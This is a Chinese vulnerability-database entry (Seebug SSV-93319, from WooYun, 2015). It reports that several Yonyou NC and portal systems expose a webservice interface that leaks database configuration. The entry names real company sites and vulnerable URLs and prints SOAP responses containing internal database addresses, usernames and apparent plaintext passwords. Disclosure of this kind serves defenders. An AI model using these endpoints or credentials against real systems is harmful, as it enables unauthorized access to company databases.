用友多个系统通用漏洞导致接口信息泄露引发多数据库信息泄露（涉及多个大型厂商）

基本字段

漏洞编号：: SSV-93319

披露/发现时间：: 2015-05-08

提交时间：: 2015-05-08

漏洞等级：

漏洞类别：: 其他类型

影响组件：: YonYou

漏洞作者：: 路人甲

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

http://wooyun.org/bugs/wooyun-2015-0112834

漏洞详情

贡献者 Knownsec 共获得 0KB

### 简要描述： * ### 详细说明： [<img src="https://images.seebug.org/upload/201505/08123720ffd7f9bd42285cc7d66a2160b2279eae.png" alt="aaa.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201505/08123720ffd7f9bd42285cc7d66a2160b2279eae.png) 通过webservice接口泄露,涉及多个系统一、NC系统 http://123.232.105.202/ http://erp.suning.com.cn/ http://115.238.57.245/ 以苏宁为例。接口地址:http://erp.suning.com.cn/uapws/service 会发现很多接口,以数据库内网链接泄露为例(太多接口了,不一一测试了) 得到数据库内网链接为:http://erp.suning.com.cn/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl 利用接口测试工具调用接口得到数据库链接为: ``` <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Header> <ns0:Urc xmlns:ns0="http://ws.uap.nc/lang"> <datasource>design</datasource> <corpCode>simpchn</corpCode> <userCode>#UAP#</userCode> <langCode>simpchn</langCode> </ns0:Urc> </soap:Header> <soap:Body> <ns1:getDataSourceConfigResponse xmlns:ns1="http://inittool.ses.itf.nc/PortalSESInitToolService"> <return>nc57</return> <return>jdbc:oracle:thin:@10.0.0.30:1521:orcl</return> <return>nc35</return> <return>is0h1idu</return> </ns1:getDataSourceConfigResponse> </soap:Body> </soap:Envelope> ``` 全部明文,数据库账号密码以及库名均是明文二、门户系统 http://hr.sbtjt.com/portal/app/mockapp/login.jsp?lrid=1 http://gpms.foton.com.cn/portal/app/mockapp/login.jsp?lrid=1 http://fm2.cscec.com/portal/app/mockapp/login.jsp?lrid=767685128 以福田汽车为例全部接口地址:http://gpms.foton.com.cn/uapws/service 数据库接口地址:http://gpms.foton.com.cn/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl ``` <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Header> <ns0:Urc xmlns:ns0="http://ws.uap.nc/lang"> <ns0:datasource>design</ns0:datasource> <ns0:userCode>1001FF1000000000J580</ns0:userCode> <ns0:langCode>simpchn</ns0:langCode> </ns0:Urc> </soap:Header> <soap:Body> <ns1:getDataSourceConfigResponse xmlns:ns1="http://inittool.ses.itf.nc/PortalSESInitToolService"> <return>foton</return> <return>jdbc:oracle:thin:@172.24.6.101:1521:gpms</return> <return>hwpj63</return> <return>asdzxc</return> </ns1:getDataSourceConfigResponse> </soap:Body> </soap:Envelope> ``` 得到的数据库链接地址和账号密码,依旧明文三、另一版本NC系统 http://bap.ufida.com/ http://www.bewg.net.cn/ 以用友官网系统为例全部接口链接：http://bap.ufida.com/uapws/service 数据库接口链接：http://bap.ufida.com/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl ``` <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Header> <ns0:Urc xmlns:ns0="http://ws.uap.nc/lang"> <ns0:datasource>design</ns0:datasource> <ns0:userCode>#UAP#</ns0:userCode> <ns0:langCode>simpchn</ns0:langCode> </ns0:Urc> </soap:Header> <soap:Body> <ns1:getDataSourceConfigResponse xmlns:ns1="http://inittool.ses.itf.nc/PortalSESInitToolService"> <return>design</return> <return>jdbc:oracle:thin:@127.0.0.1:1521:orcl</return> <return>ba_demo_design20131231</return> <return>1</return> </ns1:getDataSourceConfigResponse> </soap:Body> </soap:Envelope> ``` 四、电子商务采购平台 http://61.178.99.236:9002/ebvp/ http://www.xinfagroup.com.cn:8080/ebvp/ http://zc.hayao.com:8080/ebvp/ http://221.1.83.115:9001/ebvp 以信发公司为例全部接口地址：http://www.xinfagroup.com.cn:8080/uapws/service/ 数据库接口地址：http://www.xinfagroup.com.cn:8080/uapws/service/nc.itf.ses.inittool.PortalSESInitToolService?wsdl 数据库链接： ``` <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Header> <ns0:Urc xmlns:ns0="http://ws.uap.nc/lang"> <ns0:datasource>design</ns0:datasource> <ns0:userCode>#UAP#</ns0:userCode> <ns0:langCode>simpchn</ns0:langCode> </ns0:Urc> </soap:Header> <soap:Body> <ns1:getDataSourceConfigResponse xmlns:ns1="http://inittool.ses.itf.nc/PortalSESInitToolService"> <return>nc</return> <return>jdbc:oracle:thin:@(DESCRIPTION=(ADDRESS = (PROTOCOL = TCP)(HOST = 10.10.1.34)(PORT = 1521))(ADDRESS = (PROTOCOL = TCP)(HOST =10.10.1.33)(PORT = 1521))(LOAD_BALANCE = yes)(CONNECT_DATA = (SERVER = DEDICATED)(SERVICE_NAME = orcl_rac)))</return> <return>nc</return> <return>xinfajituan</return> </ns1:getDataSourceConfigResponse> </soap:Body> </soap:Envelope> ``` 依旧全部明文设计用友多个系统，只要在网站后面加uapws/service即可查看该系统的所有接口，我只是测试了数据库接口的信息，而且数据库基本都是明文显示，危害还是很大的。 ### 漏洞证明：

共 0 兑换了

PoC

暂无 PoC

参考链接

http://wooyun.org/bugs/wooyun-2015-0112834

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

※本站提供的任何内容、代码与服务仅供学习，请勿用于非法用途，否则后果自负

用友多个系统通用漏洞导致接口信息泄露引发多数据库信息泄露（涉及多个大型厂商）

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

用友多个系统通用漏洞导致接口信息泄露引发多数据库信息泄露（涉及多个大型厂商）

基本字段

来源

漏洞详情

PoC

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定